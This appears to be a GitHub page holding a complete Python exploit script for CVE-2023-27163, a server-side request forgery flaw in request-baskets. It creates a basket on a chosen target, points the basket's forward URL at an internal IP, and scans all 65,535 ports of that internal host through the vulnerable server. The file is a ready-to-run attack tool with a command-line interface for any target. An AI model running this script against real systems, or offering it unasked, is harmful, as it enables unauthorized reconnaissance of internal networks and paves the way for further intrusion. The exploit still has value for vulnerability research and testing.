-
Notifications
You must be signed in to change notification settings - Fork 2
/
CVE-2023-27163.py
129 lines (101 loc) · 3.65 KB
/
CVE-2023-27163.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
import requests
import random
import string
import os
import argparse
def generate_random_basket_name(length=8):
'''
Generate a random basket name.
'''
return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))
def create_basket(target_url):
'''
Creating a new basket.
'''
basket_name = generate_random_basket_name()
url = f'{target_url}/api/baskets/{basket_name}'
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0',
'Accept': '*/*',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Authorization': 'null',
'X-Requested-With': 'XMLHttpRequest',
'Origin': target_url,
'Referer': f'{target_url}/web',
'Connection': 'close'
}
data = {}
response = requests.post(url, headers=headers, data=data)
token = response.text.split('"token":"')[1].split('"')[0]
basket_name_extracted = url.split('/')[-1]
print("\n----------Creating a New Basket----------")
print(f"\nGenerated Basket Name: {basket_name_extracted}")
print(f"\nToken: {token}")
return token, basket_name_extracted
def configure_basket(target_url, token, basket_name, port, internal_ip):
'''
Configuring the basket for updating port.
'''
config_url = f'{target_url}/api/baskets/{basket_name}'
config_headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0',
'Accept': 'application/json, text/javascript, */*; q=0.01',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/json',
'Authorization': f'{token}',
'X-Requested-With': 'XMLHttpRequest',
'Origin': target_url,
'Connection': 'close',
'Referer': f'{target_url}/web/{basket_name}'
}
url_port = f'http://{internal_ip}:{port}'
config_payload = {
"forward_url": url_port,
"proxy_response": True,
"insecure_tls": False,
"expand_path": False,
"capacity": 200
}
config_response = requests.put(config_url, headers=config_headers, json=config_payload)
#proxies={"http":"http://127.0.0.1:8080", "https":"https://127.0.0.1:8080"}
#print(f"Basket Configuration Change Response for {basket_name}:")
#print("\nBasket is reconfigured successfully!")
def port_scan(target_url, token, basket_name, port, internal_ip):
'''
Port Scanning with different port for internal IP address.
'''
configure_basket(target_url, token, basket_name, port, internal_ip)
basket_url = f'{target_url}/{basket_name}'
basket_response = requests.get(basket_url)
if basket_response.status_code != 502:
print(f'http://{internal_ip}:{port}')
else:
pass
def main():
parser = argparse.ArgumentParser(
description='CVE-2023-27163 - Internal Port Scanner'
)
parser.add_argument(
'-t',
'--target',
type=str,
required=True,
help='Specify your target!')
parser.add_argument(
'-i',
'--internal-ip',
type=str,
default='127.0.0.1',
help='Specify internal IP')
args = parser.parse_args()
target_url = args.target
internal_ip = args.internal_ip
token, basket_name = create_basket(target_url)
print("\n---------Performing Port Scanning---------")
for port in range(1, 65536): # Scanning ports from 1 to 65535
port_scan(target_url, token, basket_name, port, internal_ip)
print("Port Scanning is completed!")
if __name__ == "__main__":
main()